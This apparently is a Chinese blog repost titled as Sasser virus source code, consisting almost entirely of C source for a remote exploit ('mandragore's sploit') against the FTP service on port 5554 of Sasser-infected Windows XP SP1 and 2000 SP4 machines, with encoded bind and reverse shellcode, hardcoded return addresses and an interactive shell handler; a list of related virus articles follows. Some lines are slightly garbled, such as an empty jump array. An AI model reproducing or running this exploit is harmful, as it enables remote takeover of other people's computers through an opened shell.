震荡波病毒原代码

转载 2006年05月20日 18:57:00
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define NORM "/033[00;00m"
#define GREEN "/033[01;32m"
#define YELL "/033[01;33m"
#define RED "/033[01;31m"
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.3 for " RED "sasser.x" NORM
#define fatal(x) { perror(x); exit(1); }
#define default_port 5554
struct { char *os; long goreg; long gpa; long lla;}
targets[] = {
// { "os", go ebx or pop pop ret, GetProcAd ptr, LoadLib ptr },
{ "wXP SP1 all", 0x77C0BF21, 0x77be10CC, 0x77be10D0 },
{ "w2k SP4 all", 0x7801D081, 0x780320cc, 0x780320d0 },
}, tsz;
unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,
0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,
0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,
0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,
0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,
0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,
0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,
0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,
0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,
0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,
0xC8,0x21,0x0E
};
unsigned char rsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,
0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,
0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,
0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,
0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,
0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,
0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,
0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
};
char verbose=0;
void setoff(long GPA, long LLA) {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1d,&gpa,4);
memcpy(bsh+0x2e,&lla,4);
memcpy(rsh+0x1d,&gpa,4);
memcpy(rsh+0x2e,&lla,4);
}
void usage(char *argv0) {
int i;
printf("%s -d <host/ip> [opts]/n/n",argv0);
printf("Options:/n");
printf(" -h undocumented/n");
printf(" -p <port> to connect to [default: %u]/n",default_port);
printf(" -s <'bind'/'rev'> shellcode type [default: bind]/n");
printf(" -P <port> for the shellcode [default: 530]/n");
printf(" -H <host/ip> for the reverse shellcode/n");
printf(" -L setup the listener for the reverse shell/n");
printf(" -t <target type> [default 0]; choose below/n/n");
printf("Types:/n");
for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)
printf(" %d %s/t[0x%.8x]/n", i, targets[i].os, targets[i].goreg);
exit(1);
}
void shell(int s) {
char buff[4096];
int retval;
fd_set fds;
printf("[+] connected!/n/n");
for (;;) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(s,&fds);
if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");
if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) < 1)
fatal("[-] shell.recv(stdin)");
send(s,buff,retval,0);
}
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) < 1)
fatal("[-] shell.recv(socket)");
write(1,buff,retval);
}
}
}
void callback(short port) {
struct sockaddr_in sin;
int s,slen=16;
sin.sin_family = 2;
sin.sin_addr.s_addr = 0;
sin.sin_port = htons(port);
s=socket(2,1,6);
if ( bind(s,(struct sockaddr *)&sin, 16) ) {
kill(getppid(),SIGKILL);
fatal("[-] shell.bind");
}
listen(s,1);
s=accept(s,(struct sockaddr *)&sin,&slen);
shell(s);
printf("crap/n");
}
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin;
struct hostent *he;
char *host; int port=default_port;
char *Host; int Port=5300; char bindopt=1;
int i,s,pid=0,rip;
char *buff;
int type=0;
char *jmp[]=;
printf(BANNER "/n");
if (argc==1)
usage(argv[0]);
for (i=1;i<argc;i+=2) {
if (strlen(argv[i]) != 2)
usage(argv[0]);
switch(argv[i][1]) {
case 't':
type=atoi(argv[i+1]);
break;
case 'd':
host=argv[i+1];
break;
case 'p':
port=atoi(argv[i+1])?:default_port;
break;
case 's':
if (strstr(argv[i+1],"rev"))
bindopt=0;
break;
case 'H':
Host=argv[i+1];
break;
case 'P':
Port=atoi(argv[i+1])?:5300;
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
memcpy(bsh+0x57,&Port,2);
memcpy(rsh+0x5a,&Port,2);
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
break;
case 'L':
pid++; i--;
break;
case 'v':
verbose++; i--;
break;
case 'h':
usage(argv[0]);
default:
usage(argv[0]);
}
}
if (verbose)
printf("verbose!/n");
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()");
sin.sin_family = 2;
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
sin.sin_port = htons(port);
printf("[.] launching attack on %s:%d../n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
if (bindopt)
printf("[.] will try to put a bindshell on port %d./n",Port);
else {
if ((he=gethostbyname(Host))==NULL)
fatal("[-] gethostbyname() for -H");
rip=*((long *)he->h_addr_list[0]);
rip=rip^0xdededede;
memcpy(rsh+0x53,&rip,4);
if (pid) {
printf("[.] setting up a listener on port %d./n",Port);
pid=fork();
switch (pid) { case 0: callback(Port); }
} else
printf("[.] you should have a listener on %s:%d./n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port);
}
printf("[.] using type '%s'/n",targets[type].os);
// -------------------- core
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0) {
if (pid) kill(pid,SIGKILL);
fatal("[-] connect()");
}
printf("[+] connected, sending exploit/n");
buff=(char *)malloc(4096);
bzero(buff,4096);
sprintf(buff,"USER x/n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
sprintf(buff,"PASS x/n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
memset(buff+0000,0x90,2000);
strncpy(buff,"PORT ",5);
strcat(buff,"/x0a");
memcpy(buff+272,jmp[0],2);
memcpy(buff+276,&targets[type].goreg,4);
memcpy(buff+280,jmp[1],5);
setoff(targets[type].gpa, targets[type].lla);
if (bindopt)
memcpy(buff+300,&bsh,strlen(bsh));
else
memcpy(buff+300,&rsh,strlen(rsh));
send(s,buff,strlen(buff),0);
free(buff);
close(s);
// -------------------- end of core
if (bindopt) {
sin.sin_port = htons(Port);
sleep(1);
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed");
shell(s);
}
if (pid) wait(&pid);
exit(0);
}

震荡波病毒C语言源码

#include    #include    #include    #include    #include    #define NORM "\033[00;00m"   #defi...
  • ccx_john
  • ccx_john
  • 2014年07月06日 15:50
  • 868

中了勒索病毒要怎么办

下面是昨天肝了一夜研究的成果 首先, 不要做的事: 1.删那些生成的加密文件, 原因:那些确实是你的文件啊,万一以后有大佬把加密算法破解了呢,留着不亏. 2.不要将你的电脑再次接上内网, ...
  • zhembrace
  • zhembrace
  • 2017年05月16日 10:58
  • 1314

常见手机病毒学习总结

常见的手机病毒有哪些种类 破坏系统、盗取账号、盗取网银等 手机病毒种类  手机病毒按病毒形式四类:  1.通红传送蓝牙设备传播病毒卡比尔、Lasco.A  ...
  • bcbobo21cn
  • bcbobo21cn
  • 2016年07月30日 11:13
  • 1338

勒索病毒工作原理

前些天借着Windows上的”永恒之蓝“漏洞,本来几乎快销声匿迹的加密勒索病毒又重新回到了公众视线里。由于电信等网络运营商早就封堵了可能导致中毒的445端口,所以外网影响不大,但是教育网里的同学就遭殃...
  • qmickecs
  • qmickecs
  • 2017年05月22日 13:48
  • 3088

记一次清理Android设备里病毒(Ghost Push)的过程

设备:迈乐M9  OS:Android 4.2.2 固件版本:V3.4.5 android设备中了病毒,每隔几分钟自动弹色情广告,或者是自动下载安装应用。从应用管理看到奇怪的进程。 前期尝试: 使...
  • feiniao8651
  • feiniao8651
  • 2016年10月24日 22:08
  • 1841

你没中过勒索病毒,不知道备份有多重要

数据备份很重要,那些安全事故其实离我们每个人都很近。
  • iotisan
  • iotisan
  • 2017年01月25日 01:55
  • 1393

基于Linux系统的病毒

尽管在Linux里传播的病毒不多,但也是存在一些,我从一些安全站点搜集了一些资料。     1、病毒名称:     Linux.Slapper.Worm     类别: 蠕虫     ...
  • mao0514
  • mao0514
  • 2014年06月18日 17:48
  • 1839

病毒分析流程总结

前段时间拜读了《恶意代码分析实战》一书,算是对整个病毒分析的流程和常用方法有个大致的了解,现在总结一下,也算是给自己做的一个笔记。         首先,病毒分析师必须具备以下知识:编程、汇编/反汇...
  • auriel
  • auriel
  • 2015年04月27日 15:48
  • 2078

认识常见脚本病毒及防范

1. 简单系统命令隐藏病毒:如自动重启病毒:   打开记事本,写入“shutdown /r”命令,保存为名字.bat 文件,创建快捷方式(.link)右键属性,可以更改图标以迷惑对方,当点击运行...
  • boke14122621
  • boke14122621
  • 2017年03月27日 19:56
  • 638

电脑中病毒了--Autorun 病毒

先要将支持AUTO病毒产生的根源断掉,按如下路径操作: 开始菜单--运行--gpedit.msc--用户配置--管理模板--系统 在右边的选项中选择“关闭自动播放”,右键选择“属性” 设置为:“关闭所...
  • Trassion
  • Trassion
  • 2013年12月11日 15:46
  • 1689
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:震荡波病毒原代码
举报原因:
原因补充:

(最多只允许输入30个字)